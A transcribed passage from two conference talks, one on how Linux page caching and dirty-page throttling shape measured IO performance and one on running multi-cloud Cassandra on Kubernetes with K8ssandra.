do them and these are all sequential and I'm reading it for the first time in my cache so I'm still bound by the latency despite the fact that my latency is really low so this is really great but still I'm bound by the latency by doing IO. I do not hit the limits of the device. Now, if I perform the exact same run again, well, this is how am I doing it but it returned immediately and these are the figures. My IOs per second now doing it a second time with the Dash Desk Infill at Zero Switch so I actually can take advantage of my cache. I'm doing 580,000 IOs per second at a rate of 4.5 gigabytes per second. I promised you it can have magical results. I think these are magical results. The first time was okay. Well, actually really good for doing physical IO and the second one is marvelous. This is what you want to see. The reason for it, well, kind of obvious. I haven't done any physical IO actually at all and FIO does show this with the IOs line. It didn't do any physical IO. It just read it from memory. Now, how about four gigs? And mind you, my system is four gigs in size approximately. So I'm doing the exact same thing. The only thing I changed is setting it to four gig. Well, I'm looking at the same stats again. So the summary of the run is this first run is actually alike the other first run. I'm bound by the latency of doing the IOs which are really fast but still you need to read it. So I'm bound by the latency. So the rate is identical to the two gig. Now let's perform the exact same run again. Look at the option dash dash no random map. FIO is really smart. At first I try doing it and running it again but because FIO, if you're doing random IO the IOs are truly randomized but it keeps a map in memory and it very explicitly touches every single block truly only once. To truly only take each block once for reading it which is not the random in my definition because an application which would fire random IOs would touch some blocks multiple times. You can achieve that by setting the dash dash no random map flag. Again, what I said is FIO is so smart and well thought through that if you think, if you want certain behavior please validate that it actually does what you think it is doing. So it is random but only random in choosing the blocks not random in choosing blocks multiple times. I was very surprised to learn that. And if it does, if I don't do this and just touch every block once and I've got lesser memory than the file it cannot keep it and it will actually push through all the IOs so I will not have any caching effect at all. And that is more or less what is achieved in this run. I'm doing loads of IOs because the file I'm trying to read is bigger than memory so I cannot cache the entire file. And just because I touch some blocks multiple times I will get some caching effect but the caching effect here is way less. It's, I'm doing 4200 IOs per second which is where I'm bound by. And that is because I simply touch some blocks multiple times but most of them still need to be read. But the question is I've now done some tests but are these tests actually reality? If you're most of the time if you're doing stuff with IO you have an application which drives them and this application likely will use the data you're trying to IO and will keep that in memory for the sake of running the application. So what if I do the same tests but occupy 50% of the memory? Well this utility I wrote which I actually borrowed from a C program from this URL and reprogrammed it in Rust. I take 50% of memory and I touch the memory so it's actually allocated. And then by that take 50% I map 50% of the memory so it's not available anymore. And then redo the same tests. What is happening? This, I have no idea what happened. So this is running the utility. The first run is identical to the one with without memory taken because that just reads the IO, reads the blocks and the IO it's unbound by the latency and the latency doesn't change. So, but I have, so the, it's generally equal. And if I do it again, because I have lesser memory in my server, I hear now with 2GIG, I already have to add dash dash no random map but if I'm doing it again, well this is too small to be visible, sorry about that. I cannot get the same figures as I had previously. Well, I think in this order, this is really obvious but now think about a scenario where you have an application or a database. I think it's quite common to have a database in an application stack. You just start up the database, nothing is actually allocated and you run a test and the test can take advantage of the caching and you say everything is good. Then a year later if, or whatever the time of the project is and you're actually, the whole application is done, you hook up all your connections to the database and the database is actually being used and you're doing exactly the same and then the performance is totally different. This is what I tried showing here and this is actually a real-life situation which I've seen an enormous lot that people tested actually probably without realizing in an absolute good situation and then in reality, when memory is actually taken and stuff is actually run, performance is drastically lower and nobody understands why it's low because we tested it. Well, this is the reason you have to understand your memory footprint and your actual IO amount that you're doing and you can see it here too. I'm doing the two gig and FIO shows me that I've performed a lot of IOs. You see IOs there at the bottom line. Now let's look at writes. Here I start too with an idle machine and I write something and this is summary of the run. My IOs per second, for writes, obviously I do not have to do two runs. For writes, I just perform writes and it's done. For writes and writes are special. I just said it in the beginning and why I write special. If you're writing in Linux, any buffered write is not done to disk. A lot of people think it's done to disk, it isn't. You're writing into memory and then the kernel will decide at a certain point in time to write the blocks you've dirtied to disk. And that's a really interesting concept and it's not obvious because you think normal human thinking is that if I'm writing, I'm writing to disk immediately but that's not what is happening. Another thing, sorry, yes, there is. Yes, yes, the remark is even if you're writing then the disk control will cache it. Yes, absolutely. I do not want to go down to that level because the amount of stuff in Linux is already a lot. Writes are special. The first thing which is really special in Linux with writes which you have to realize because then it becomes a lot more logical is if you read something and then the memory is needed, this read can be discarded immediately. Nothing is harmed by discarding this block and it can be reused. If you're writing something and you've got this dirty block, the kernel has no other option than to write. It cannot, it will not even put it to swap, a write to swap, it will write it to disk and it must do it because if it doesn't, then it will corrupt the file system. And that is what I meant with writes are special. Therefore, the limits for writes are way lower. The amount of writes that you can do are limited because you cannot swamp your memory with doing writes because then your system is stuck with dirty blocks and you can probably write to memory faster than you can write to disk, right? That's the whole purpose of buffering them in the first place. So therefore there are kernel parameters set which are VM dirty background ratio, a VM dirty ratio. And here is a thing which is really not well documented and which a lot of people think these ratios come from the total amount of memory. That is not true. I think it's even documented in that way. I'm not sure if it's in the kernel documentation but there are a lot of blogs describing that these ratios are from total memory. These ratios are from available memory which means that if you take an application and you start allocating memory, then the available memory obviously lowers because you've taken memory and use it for a certain purpose. So the available memory lowers automatically your dirty background ratio and dirty ratio therefore also will lower. And that is really important to understand because that means that then a write which could be buffered in a certain way at one point in time, if your application is really hungry for memory and takes a lot of memory, then at another point in time your threshold for needing to write these dirty pages might be way lower. And actually what the kernel does is if the kernel finds that you're swamping the memory with dirty pages based upon these ratio, if you're performing a write system call, the kernel in the write system call will evaluate the amount of dirty pages and just put a sleep. This is really what it does. It calls balancing. It will put a sleep in the write call and just put your process or threat in a sleep state. It will truly just schedule it off CPU for a certain amount of time in order to try to push back on the writes to try to balance it. And it's called actually balancing. And I've got a link here too to a blog post where I wrote about it where I go to the exact lines in the kernel where this is happening. And the reason it's actually good even if you can't read C to go to the kernel code because there is a lot of explanation about these ratios in the C code of the kernel for this. So I'm writing and I'm writing 500 megabytes. And this is the summary of it. I'm doing 500 megabytes on this system and I get really great figures. It's 193,000 IOs per second and 1.5 gig per second. And why am I getting this really good figures? Well, I've got a system which has no applications taken a lot of memory and therefore this write of 500 megabytes didn't actually produce any IOs whilst running it because I was below the limit. And that is what is on the lowest line is my available memory is three gig and the ratio is set to 922 megabytes. So therefore the 500 megabyte I'm trying to write fits in memory as dirty pages. Brilliant. Now let's look at reality too and I think you understand what the reality stuff here is doing. If I take 50% of memory then my available memory will lower obviously and therefore my percentage of the limit will be lower and therefore if I produce the same write of 500 megabytes and do it again in pretty much the same sense as my reads now all of a sudden this write will be way slower and that's not because the system has magically gone slower. No, there is a very good explanation. We've taken a lot of memory. We have way less cache and therefore the kernel will do exactly the same if you cross a certain threshold it will determine that you're trying to flood the system with dirty pages. So therefore it starts throttling your write calls in order to balance the memory. And well this is all doing that and well write two gig I don't think I can add a lot if you know this and if you understand that these limits gets lower. It with two gig the first run of two gig will already go over the limit. So with 50% taken it will also go over this limit. So what am I saying? If you have a system running in Kubernetes in a pod which is probably has a certain amount of memory and you rely on IO performance at a certain rate do you and you know you're doing Buffert IO do you keep track of available memory and do you understand whether what you're trying to do fits in with how your memory is sized? Do you know that? Because I don't know a lot of people who actually actively keeping track of available memory whilst if you're relying on performance this should be the parameter to look at because that is what is most telling about what is available for it and do you understand the amount of reads and writes that you're doing? And this is a really tricky one and in my past as an Oracle database administrator I saw that a lot too. If you're doing a certain amount if you're using a certain amount of pages now it doesn't mean that you will be doing exactly the same if you're a few months or a year further. Probably if you have a successful application there'll be more users, there's more data so you're maybe are doing more IOs. So even if the application absolutely didn't change if everything kept on being the same you could still hit a limit simply because you're using more data and your memory amount is fixed. So therefore you hit the threshold and therefore your fast IOs from cache cannot work anymore because you're requesting more IOs. And it's important to understand the differences between reads and writes. And this is active data set that's what I just talked about do you understand how much data you're requesting all the time and do you know if it grows or not? Well I said this at the beginning and this is actually my last slide so then I'm open for questions or any remarks in that sense. The tests I did were performed on a system with no swap device that is how we do it and for simplicity and understanding where if you have a memory shortage that is, I was kind of surprised but it's actually refreshing because you do not have to swap because I see swap as kind of a question for falling. If you have too little memory you have a problem period or your performance is influenced let me put it more friendly your performance will be influenced. If you do not have swap you will hit kind of a wall because your memory is limited. If you have swap you will be hitting the wall too. No question about that. I know if you're running out of memory you're running out of memory period but you have discussion that it is a little less painful within certain limits. So I'm not advocating totally against swap but I'm also not advocating for having it all the time. You have to think about it whether it makes sense and if you want the complication especially if performance is critical. So well and then the last remark is Linux ages buffers based upon an LRU mechanism least recently used. So if things swap out it's not used in a long time I can guarantee that well it's based upon the LRU state of all the pages obviously but it isn't used in a long time so if you swap out some stuff it might not really be well it means you demanding memory which you don't have so that is the reason why it would swap in the first place but it's not really a problem if you have some swap being in use because the Linux corner will try to do as little as possible so if it's swapped out pages and you're not requesting them they will be sitting there swapped out as long as the application from which they came from is still active and it's not a problem. A lot of people think it's a problem it's not a problem. So that is the end of my presentation so hopefully you've enjoyed it and it gave you a lot of thoughts. I will repeat the question. The question is how does the right throttling work? I think that is a really short version. The right throttling works but essentially it just tries to add time to prevent the system from getting swamped with pages like I explained so it will do a little and I think it will go up to two seconds or something like that but you have to read the source code if you go to the link you can see it it's really interesting. There is a Perf you can set a Perf probe on the kernel how is it called? It's called a probe but on the kernel function which executes this which will then tell you whether it did the throttling and for how long. So that is how you can see it but there is no that is a really weird well for my mind Oracle is really well instrumented there is no other indicator that this is happening and that is the reason why it was kind of surprising to me that this is happening in the first place because there is no statistic that will tell you it happened. I will get, I think, yes well the way thing which happens in the right call is actually the Linux scheduling of CPU for a certain amount of time. No that is, sorry, no sorry IOS that shows the block device statistics so that has nothing to do with that. IOS that will show you how it communicated with the disks not how the process performed right. So, yeah, it's really close but it's really two different layers. Prox, so the Linux kernel has statistics and that's Prox, oh PSI. So the question is the Linux kernel has PSI and does PressureStallInfo give more or more useful information than ProxMemInfo? I think they serve two different purposes. ProxMemInfo gives you a lot of details but it really doesn't tell you anything about performance and PressureStallInformation is all about if I'm executing IO, what is the impact on running because that is what I think the stall information is showing you so in my mind they show you two different sides of doing IO or well actually ProxMemInfo doesn't say anything about IO just how memory is divided between all the pages in a lot of details and PSI will tell you that but I haven't looked too deeply at PSI because it is a fairly recent feature. There hasn't been a lot. Well, there is enough blog posts about it but not an overly lot and I haven't seen a lot of people actually using it. That is what I've seen which is a shame because I think it's really interesting and if you have the opportunity to enable it I would certainly do it to see if you can make sense of it because it gives you actually information based upon the perspective of the process running the IO instead of just figures for an amount of IO's that you're doing. So it's a really good thing to mention but I haven't got a lot of experience sadly. Okay, I think I understand your question. Your question is okay, you've talked about it but what should I do now with this information? So the question is well I think this question still is okay. You've told me a lot of details about how this works but what should I do? What can I do with it in a practical way? Well, a lot of these details would mean... You talked about the examples with 50%. So does the swapper process get running at the point that both of those examples are read and write when you don't have a swap available, a swap file or whatever you use, a swap space. So could you see that process running at those times? I try, so your question is if the problem happens, what can I see? What I was going to say, which I think like you said is quite closely related to your question is what can you do? Well, if you want to get down to the bottom of it, it will cost you time and you need to build up some experience and probably if you have a whole form of service, you do not have this time. Well, get a lot of the details and just get them. Prometheus will get them for you so you can research and go back to these details in time because that is a thing which Linux doesn't provide to you but with, for example, Prometheus or with a lot of other tools, you can get the statistics back in time so you can figure it out if you're running into a problem. One of the things which I think is really important to understand is you need free memory if you have an application doing IO, doing buffered IO, you need free memory which for the perspective of someone who is trying to size a system is memory not doing anything, you need free memory for the sake of this caching and this is what I see being left out all the time. People would carefully size up saying I have an application which takes so much memory and I take so much for the operating system so this is the amount of memory I need and what I'm telling you is if you're actually using that memory, then there is nothing left for performing this buffering so then your IO will fluctuate all the time, it will be good one time and then be absolutely crap the second time and it's kind of hard to figure out why. Yeah, well the first realization is you have to understand that you have to size extra memory which from the perspective of sizing memory is that memory doing nothing but you actually need it. Exactly. We have time for one more question and over here was I saw Henry's over here. So you've switched between two things. One in my mind is that you have an Oracle database that pretty much owns the machine in certain cases and then but then you also talk about Kubernetes where my pod that is doing read and writes is fighting with other pods that are all using the combined resources and machine so my pod though it could be memory limited the caching and the read write layer is really being shared by all the other pods so how do I determine what my pod needs because I don't know what the other pod owners are doing with their pods as well so once again I understand that if you had an application that owned the box you can make these calculations but once you say Kubernetes pod you're fighting with other people. That's a very good remark and this is something which I generally find lacking in a lot of talk about Kubernetes because indeed you have a single physical box and you run multiple pods, multiple machines which do not see each other which try to use these shared resources which they all share in the same machine and I think this is a very big under an aspect of running Kubernetes which is greatly underappreciated on looking into because what should be there but that is an opinion I'm not saying it should but simplistically thinking if you're having resources and you know the amount of resources you should divide them and just say okay well for CPU I know you can do that you can already divide so you have a fixed amount of CPU memory is also divided per pod as far as I know so you can do that, figure out if you have enough memory but then indeed your physical IO devices are shared and actually in my opinion your physical IO should also be fixed per pod so that you can carefully cut out and say I've got 3000 IOs and especially in the cloud and with a lot of other machines you know your amount of IOs per second that you have and the bandwidth that you have and say I want 20% of this IO to be dedicated to this specific pod which is running here so this is a resource which need to be there if this pod is running on this physical machine but that is an opinion I have and it's not that I want it the point is if you don't do that then exactly what you say and again this is what I see as a big problem your usage and your latency will come across as very random because at one point in time you can do a certain amount of IOs and 20 minutes later you can't do it because you have a few other pods who also try to share the same resource and therefore you get a lower amount and this is a big problem if you try to do quality of service and say I want to make sure that it's running at a certain rate absolutely I think that is a missing part so yeah I wholeheartedly agree with what you see and absolutely true Thank you so much for feeling all these questions Fritz Really awesome talk Please feel free to continue the conversation I'm sure Fritz is happy to catch you later or outside we will be back in about five minutes at 16.30, 4.30 p.m. for delving into more cloud native database related concepts That's fine Looks What do you say? Geneva right? Plenipere All right Good afternoon everybody Come on in Settle down and I'm excited to introduce Rog Srinivas who is here to share about Cassandra running on Kubernetes and just a little bit more of a deep dive on databases that are cloud native so please give him a hand and welcome him to scale Thanks for being here Thank you, Geneva Glad to be here but it's always kind of dicey to be the last session Oh, there's one more I guess after this, right? So I guess I'm okay So in terms of history I've submitted several times to scale but this is the first time I'm speaking at scale Really excited How many of you have already attended multiple scales? Looks like all old timers But treat me gently In any case I'm here to talk about Cassandra running on Kubernetes and multi-cloud Kubernetes so a lot of different topics coming together Has a little bit of a story because it started at KubeCon U actually in LA about a year back, October when I did a multi-cloud or a multi-region actually Cassandra on GKE because GKE networking is probably the easiest among all the other clouds, right? But fast forward through Reinvent and KubeCon EU and all that Now I'm in a position where I've been able to install a multi-cloud Cassandra and you will see that in action today in a lot of demos today, okay? A multi-cloud Cassandra running on GKE and EKS which is installed from AKS, okay? So I think it's pretty cool you'll see that it took me a few months to actually make that happen and I think it'll be even more exciting now that Satya Nadella and Larry Ellison are talking about multi-cloud, right? So everybody is talking about multi-cloud but my question to the audience is how many of you are already doing multi-cloud? A few people and I know multi-cloud has different connotations, right? You know, if I use different clouds it means it could mean multi-cloud but in this context it really means my application is spread across different clouds. So with this new definition where my application is running on multiple clouds at the same time how many of you are doing multi-cloud? A few, okay. And all of you, I mean I assume that three of you are using Kubernetes or something else or kind of, yeah, yeah, okay. Okay, so let's talk about this and we'll see where it takes us, okay? Oh, by the way, my name is Raghavan Srinivas. I work as a developer advocate for data stacks. You know, I was a mechanical engineer but since then I've done a lot of distributed systems middleware, some of the things I like to see is code in action and that's why I'm gonna do a lot of demos today. And I have a colleague of mine, Matt Overstreet who is much smarter than me so I'll delegate all questions to him, right? But again, feel free to talk to us if you have any questions about Cassandra. He did a great talk. I recommend you kind of go take a look at that as well. You know, where he talked more from an application patterns perspective rather than from any infrastructure perspective. I myself, I live at kind of the confluence of both infrastructure and applications. I just want things to work. I come from a Cloud Foundry background. You know, I just want things to work. You know, I don't know if you guys have heard of the famous CF push and everything is stood up. I don't know, you know, anything about, you know, where it is, you know, where it is deployed, how it is deployed, what are the, you know, things that make it happen, it just happens, right? So I'm also a big fan of kind of the inner loop. Inner loop is when you have a kind of a lightweight CI CD cycle and you know, some of you used scaffold, jib and kind of those tools. It makes it a lot easier for somebody who's an application developer on Kubernetes to be able to do this, you know, mundane tasks over and over again, like maybe 100, 200 times a day. With that said, how many of you were able to attend CAD cost gross talk this morning about Kubernetes? Yeah, that was a great talk as well. So I recommend, you know, if you're new to Kubernetes, how many of you are new to Kubernetes? I mean, like really new, okay. Okay, that's about half. That's kind of what I expected as well. I would strongly recommend you attend that, I mean, not attend the talk because it's already done, but you know, take a look at it or if you have a chance, you know, kind of see her at some point. We have a great crew behind us. We do workshops every week. They're all free to attend. We have a tier which makes it possible for you to actually run some fairly sophisticated production workloads and you get a $25 per credit. I mean, $25 per month credit without even having to put any credit card or anything like that. The main goal of our data stacks developer crew is to up level, you know, your learning of your experience or whatever that case may be. And I myself learned a lot in those workshops. It happens every Wednesday at 11 o'clock, 11 Eastern, I need to be specific about that, which is a little bit early for Pacific, but we try to get here to a worldwide audience. We get about anywhere between 200 to 800 people. So feel free to attend that if you want some more basic information, because today I'm gonna be going into a little bit more advanced topics, okay? But even though I'm gonna be doing a lot of advanced topics, and by the way, I've been criticized for being a little too loud, okay? Which you can see, it comes from excitement, okay? So if I'm too loud, you know, just let me know. I will pipe it down, okay? I'll try to anyway. So the agenda for today is just do a quick intro, which I already did, right? And then for those of you who have never heard of NoSQL or Cassandra, a very quick intro of NoSQL and Cassandra, and then a little bit about Katsandra, which is a play on Cassandra and Kubernetes names, right? And I think it's a pretty cool name. It's Cassandra running on Kubernetes. And then of course, the multi-cluster, multi-cloud, using the Katsandra operator, which is introduced very recently. So when I started my GKE adventure, there was nothing as a Katsandra operator. There really wasn't. So I had to do things manually. But now I don't need to anymore, and I'll show you how we can do that. You know, it uses, and maybe I'm giving away everything right now. But basically what Cassandra does is uses something called as a gossip protocol. And as long as one node from a Cassandra perspective can talk to another node, you enable the networking to make it happen, then essentially it can form a larger cluster on its own. And that is all that I'm gonna show today, okay? Basically it doesn't matter whether it's multi-region, multi-cluster, multi-region, or multi-cloud, it works exactly the same. And the gossip protocol is pretty cool because what it's saying is it's just not kind of like a heartbeat kind of thing. It actually exchanges more information to the level that each node has an idea of what the other node is doing at any point in time. And not too much information, it's not too chatty, but at the same time it's not really basic information. And as long as you enable the networking, you can make it happen. And you will see one or two instances of that. I won't go into my first adventure, which is with GKE, but I'll go into EKS where I use something called as EKS cube fed. Unfortunately, cube fed is not, anybody using cube fed anyway? I like to talk to, yeah, I don't see any hands at all, unfortunately, but EKS cube fed is a great project and I'll talk about that. And then I'll do some demos and then finally, kind of point you at some resources and hopefully we can get out of here much before half past five, okay? All right, so no big deal, no sequel was a, somebody came up with this catchy hashtag, but I was corrected that somebody actually had invented this term, but I think it got popularized a little bit more by this meetup on June 11th, 2009, roughly 13 years ago, okay? So really if you think about Cassandra, no sequel and all that, it's not fundamentally new. It definitely isn't, but if you think about the cloud and no sequel, there are a lot of commonalities, okay? One of the biggest things about no sequel is that it's really about horizontal scaling, commodity hardware, cheap hardware, but tons and tons of them so that even if failure happens which is gonna happen in distributed systems, you can still deal with it by having a replication of the data and you don't need to worry about any of that as a developer. It's all automatically taken care of for you. That is in general the philosophy of no sequel. Of course, each of the different platforms vary a little bit, but we will look at all of this in just a second. There are a lot of examples, Cassandra, Mongo, Couch, HBase, Couchbase, and so on and so forth, okay? But in general, what it is is about horizontal scaling. It's because with a relational database, you can go up and up and up and up. At some point, it's gonna keel over and fall, right? And really, there are ways in which you can do, you can spread your data on a relational database, but it's very clumsy, very awkward, and a lot of times you have to do it manually and it's never foolproof, right? Whereas no sequel, on the other hand, was really conceived with the idea that distributed systems failure is gonna happen, so what I'm gonna do is I'm gonna spread the data across. I will worry about how to spread the data across. I might use some kind of consistent hashing algorithm. Don't worry about it, I got it for you, right? And what happens when some piece of data that you're trying to access actually is not available at that point? Those are the things that the no sequel database is gonna deal with. It's really meant for the cloud even before there was a cloud. That's kind of how I put it, okay? Some of you might have heard of this famous cap theorem or sometimes referred to as a Brewer's Conjecture, but essentially what it says is in the event of everything running fine, everything is fine, okay? So in other words, I can have consistency, I can have availability and I can have partition tolerance and I can, well, failure means even partition tolerance, but in essence, when a failure happens, you have to pick two of the three, okay? Unfortunately, you have to give up one of these, right? And that's the way the distributed systems work, okay? So either you have to give up consistency or you have to give up availability or you have to give up partition tolerance, right? So you can't have all three at the same time. And turns out giving up on partition tolerance is probably worse than giving up on consistency because those kind of consistency issues, even my grandmother can notice that that's a problem, right? On the other hand, in consistency, there is this concept of eventual consistency where things might seem to be off a little bit, but it's really not a big deal because eventually they'll become consistent, right? And turns out even for some of the fairly sophisticated distributed applications, eventual consistency might be good enough, okay? But you really don't wanna sacrifice on partition tolerance and we'll see where Cassandra fits in. Obviously, partition tolerance is extremely important, but we are an AP system. And as you can see here, most NoSQL systems do not give up on partition tolerance, they may give up on availability or consistency, right? And really it's not like it's eventual consistency consistent either, right? You can actually make it what we call as tunable consistency and some people don't may not like that term, but essentially what you can do is you can say, I want strong consistency, but now the system will not be available at that point because if I want a acknowledgement from all of the different replicas, right? Then typically what will happen is, the system will not be available because it may not be able to take care of that particular transaction or that particular right. One of the key things about Cassandra is that there is no single point of failure and there is really no such thing as a master. Basically, you can call it a peer-to-peer architecture if you will, a lot of terms, a lot of times you might have seen the ring associated with Cassandra and essentially every node is kind of treated the same, okay? And all of these is important to keep in mind when you're building this multi-cluster Cassandra because it makes it so much easier to build a multi-cluster given this architecture. And in a lot of ways, remember again what Kelsey Hightower said, Kubernetes is really not a platform, it's a platform to build platforms, right? So likewise, the multi-cluster concept really depends on the application of the platform that you're building on top of Kubernetes and whether you can take advantage of it or not. In the case of Cassandra, actually it's pretty straightforward. Why do you need to partition? Because you can't fit all the world's data in one node, right? So you distribute it to multiple nodes and you shard the data, but sharding is hard, right? And that's why the NoSQL platforms shine because a lot of times you as an application developer don't need to worry about any of this, right? There were some NoSQL systems at least in the early days where you had to worry about the sharding but really, friends don't want friends to shard. It's hard, okay? All right. Cassandra, like I said, is configurably consistent which is probably a more palatable term than tunable consistent, right? So there is number of ways you can do this and like I said, you can make sure that you get consistency all in which case everybody has to reply and so on. This is not so much about kind of putting in logos and a marketing slide or whatever, but the point to be made here is that some of these large, large, large scale, thousands of nodes of Cassandra are running as we speak in some of these bigger companies like Netflix, Apple and so on. Apple is still a contributor to Cassandra and really, it's really about scale and one of the things that Cassandra shines is linear scalability. There was a study done when you went from 100 to 1000 to 10,000 whatever and it was just linear. No fall off, there is no drop off at any point of time which is very hard to do even in a horizontally scalable system, right? So, what about Kate Sandra? Kate Sandra is Cassandra running on Kubernetes, right? And a colleague of mine, Chris Bradford, a great guy again, was a former skeptic of running any database as a matter of fact on Kubernetes and it's probably true in the early days of Kubernetes because there are a lot of things which wasn't quite production quality or whatever you wanna put it, right? And there are a couple of things that even with Cassandra is not easy to do but long story short, Chris Bradford now actually works for data stacks. Okay, he's a big proponent of Kate Sandra and you will see this in action today, okay? So, what is Kate Sandra? Again, it's a cloud native scalable data tier as Matt talked in his talk yesterday. Basically, it's not just about providing the day zero tools but also providing day one tools like backup restore, being able to repair nodes, being able to get some metrics like Prometheus Grafana and so on maybe able to do ingress, you know, using traffic or engine X and so on. All of these are provided in a easy to install and easy to manage and easy to administer, okay? So, as you may expect, what is the installation? You add the repo, you know, Helm repo add Kate Sandra and just provide the repo, right? You update and then you install and that's it. As simple as this, right? You can tweak some values, very straight forward, right? You know, you can say, well, I want repo, I don't want Stargate. Stargate is a unified API and you will see that in a second. So, you can pick and choose the components that you want. You can say, well, you know, in a case of a multi-cluster install or a multi-availability zone installed, right? You can say, I want my data centers to be rack-aware and I want it to be spread on different racks and provide a higher level of availability. So, even if a particular rack goes down, right, you shouldn't have a problem. And then, of course, you know, you can go further up from there and do a multi-region or a multi-cluster or a multi-cloud as well, okay? But the philosophy is generally the same, okay? You can install it on pretty much anything. I think I've done pretty much everything, right? You know, I do have Kind, I do have Minikube, I do have Civo, I do have GKE, I do have AKS and I do have EKS as well. Really, I mean, you can install Kate Sandra on pretty much anything you want, okay? It's very cool because, you know, if I want to do some local development, you know, I do mostly on Minikube or Kind, right? Mostly on Kind. And then, you know, I basically try everything out and then finally deploy it on GKE or whatever. So, you know, pretty straightforward. In fact, our Kate Sandra operator, our docs, actually talk about installic and Kind cluster. And then, you can kind of extrapolate it and do it on multiple regions, multiple clouds and so on and so forth, okay? By the way, does anybody have a Kate Sandra installed? One. I hope you did. Yes, here's a thousand note cluster which you'll be glad to talk about. Yeah. So, Kate Sandra comes with a bunch of components. Obviously, Kassandra at the heart of everything, right? And then we have a unified API called Stargate. Okay, with Stargate, you can do, as an application developer, really cool because you can do document API if you want, you can use SQL if you want. SQL is our Kassandra query language. It's kind of similar to SQL, but it's a little different, right? And then, of course, you can do GRPC or GraphQL as well. Okay, it's a unified API, which is, again, very, very cool. And then we have two components called Kassandra and Repair, Repair, you know, which basically does the repair. And then, of course, Prometheus and Grafana. All of these are installed as Helm charts. Okay, all that I do is I install the CAS operator. And then, all of these are automatically installed for me. You can see here, I install the CAS operator, and then I get a REST or document API endpoint plus Swagger plus GraphQL endpoint. I get a Repair UI, I get a SQL endpoint, I get traffic, all of these, you know, very easy to install, okay? And we have some sessions from KubeCon. You know, if you're interested in install, you can kind of walk through that, but the Kassandra at I.O., and I'll point you at that, has wonderful docs, and all that I do is kind of refer to that. So, that was a lot of introduction about Kassandra and Kassandra. We don't even get into the multi-cloud aspect of it, right? So let's get to the multi-cloud cluster in the multi-cloud. The reason this was born was because we kind of started hitting some limits with Helm. Can you bend and make Helm work? Probably, but it just wasn't right to do it that way. So we went ahead and built another operator called the Kubernetes operator. And there's a great discussion by Jeff Carpenter and John Sander, who is basically our tech lead for Kassandra, and they walk you through this. If you have some time, it's just a discussion, talks about why Helm, what are the limits that we hit with Helm, why a new operator, what is an operator, because for some time, the Kubernetes community kind of looking down on Kubernetes operators in general, because there was a lot of perception issues associated with it. But now it looks like the Kubernetes operator has come back in style again, right? It's still pretty relevant to be able to do that because it's really all about the same Kubernetes concepts that you talk about. It's really about self-healing. It's really about being able to watch what's happening and taking appropriate action based on that, whether it's corrective action or whether it's some other action, you can do all that. So if you have some time, take a look at this, why we pushed Helm to the limit and then built a Kubernetes operator. It's a four part, so you will get all details about that. So why multi-cluster? Cassandra has always been designed for multi-region. We thought about multi-region right from the beginning. And each node of the cluster maintains the full topology. It talks to the other node, where a gossip protocol and all that, so it routes the traffic to the other neighbors. It has an idea of what the neighbors are doing because it's talking to each other and all those good things, right? So in a way, it seems like each cluster understands the other. Kubernetes, on the other hand, was not designed for multi-region and a lot of those goes back to kind of the networking design that was made where you kind of assume that each part is able to talk to another part, right? And more so, they all need to be in kind of a flat network, right? So it becomes a little hard to kind of be able to do that. And actually for my multi-cloud, there are a number of ways of achieving multi-cloud for sure, right? What I did was I used something called as a, you know, something called as Aviatrix. I don't know if any of you have used Aviatrix or are aware of it. I'm not getting paid by Aviatrix. I just liked it and I have actually submitted a proposal for KubeCon North America to be able to build a multi-cluster to actually do this in action in 90 minutes, okay? What I'm gonna show off in a little bit, okay? So the K-center operator is really designed to make it very easy to kind of do this multi-region, multi-cloud, I'm missing, always missing something, right? It's either a multi-region, multi-cluster, or multi-cloud, okay? It doesn't really matter. K-center operator will handle that, okay? I mean, if you're not doing multi, also it will still do that, but really K-center operator has a lot of advantages. The CAS operator on the other hand is great for a single cluster, right? From a Kubernetes perspective, right? But the moment you get into a multi-cluster scenario, the K-center operator has this concept of what is referred to as a control plane and it's able to take care of the data planes, you know, kind of similar to how, you know, many of the Kubernetes services operate. It supports for multi-data center, multi-region K-center clusters. It consists of a control plane and data plane, right? And the control plane creates and manages the objects. Again, using API, right? The control plane right now, unfortunately, can only be installed in a single cluster, so it's not highly available, which is, you know, coming, but it's not there yet. Do we know when it's coming or no, okay. And the data plane can be installed in any number of clusters, you know. In this case, what I've done is I've used AKS as my control plane and I've installed the two clusters on EKS and the other one is GKE, okay? And you will see that in action today. So how does that actually, how does this magic really work? The magic of this is that basically what happens is there's a little bit of a chicken and egg, right, where the control plane needs to understand the data plane, right? And so what you do is you inject the configuration of the respective data planes into the control plane. Okay, so there is a way to inject the configuration and once you know the configuration, then things become a lot easier from an installation perspective. And then, of course, once you install Cassandra, you really don't need to do anything because they know the other nodes, they're able to talk to them and gossip around and build a bigger cluster, okay? So here's an example of a Kate Sandra cluster object that is used to, you know, basically build a multi-region Cassandra cluster. You can see here there are actually two conflicts that I'm using, or two Kubernetes context. One is East and the other is West, okay? So essentially what I'm saying here is my data plane is going to be on East and my other data plane is going to be on West and this is the context that you need to use. Okay, and you will see all of this again, you know, when I kind of dissect my installation, okay? So essentially what I, there are two contexts that are injected into the control plane. One is called East, the other is called West. And once it has the Kubernetes context associated with it, it's able to go install Cassandra there and then, of course, by the way, by the nature in which Cassandra operates, it's able to build a bigger cluster. And this kind of shows the same thing as well. And this is kind of how the client config looks, but we don't need to worry too much about this, okay? And what we'll do is we'll jump straight into the demo. So remember my journey, right? My travail started with GKE where I set up, you know, the multi-region Cassandra, very easy to do because, you know, networking in GKE is a lot easier. You know, it has, you know, addresses reserved for parts and addresses reserved for services and all that I needed to do was take the address from the seed service from one and inject it into the other and then it found a big cluster, Kumbaya, you know, it's all done, right? But I'll skip that demo, but I'll skip to the next demo, which is this, this is the EKS demo, okay? And hopefully you guys can see it in the back, kind of, otherwise I'll explain it. Essentially what EKSCubeFed does, and it's a fantastic project, really. If you have not used it before, and really, you know, it provided me with exactly what I wanted. What I wanted was I knew I was gonna make mistakes. I knew I was gonna stumble. So what I did was I wanted something that was repeatable, right? And at that point, there was no CadeSandra operator. I had to inject the seeds myself and do a whole bunch of manual stuff, right? So I was lucky to find this EKS project, okay? EKSCubeFed, which is actually maintained by Amazon. But like I said, you know, the whole CubeFed thing is kind of falling out of favor. But what EKSCubeFed does is it provides me with, you know, these two VPCs. As you can see here, in this particular example, you have 172.21 running on region two and 172.22 running on central in, I believe it's in the EU central one. And the other one is EU west one. So Frankfurt, right, is running 172.21 and I believe it's Dublin, which is EU's, sorry. EU west is Dublin and EU central is Frankfurt, whatever, okay? And we'll see all that in a second. And it provides me with a bastion host. A bastion host is a way in which I can connect to these respective hosts if I want to, right? So the bastion host is installed for me. It's on 172.20, okay? It's all opinionated but that's fine for me because it works and I'm not a 